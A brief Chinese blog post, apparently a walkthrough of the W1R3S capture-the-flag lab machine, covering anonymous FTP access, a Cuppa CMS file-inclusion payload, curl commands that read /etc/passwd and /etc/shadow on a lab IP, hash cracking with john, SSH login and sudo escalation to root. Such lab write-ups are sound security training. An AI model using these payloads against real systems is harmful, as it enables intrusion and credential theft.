w1r3s靶机

主机发现

端口目录扫描

账号密码都是Anonymous 连接ftp

查看共享文件没有发现有利信息

其中找到两个加密字段,解密过后发现被耍了, "lt is easy, but not that easy"

访问扫到的目录发现是cms,上kali找payload

查看利用方式 该cms可通过文件包含漏洞读取任意文件 http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

get请求显示404,用curl发post请求

curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.132.132/administrator/alerts/alertConfigField.php

读取shadow文件,发现两个用户,使用john工具破解

curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.132.132/administrator/alerts/alertConfigField.php

成功破解

ssh连接

ssh w1r3s@192.168.132.132

普通用户,且有全部sudo权限,sudo su root提权

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值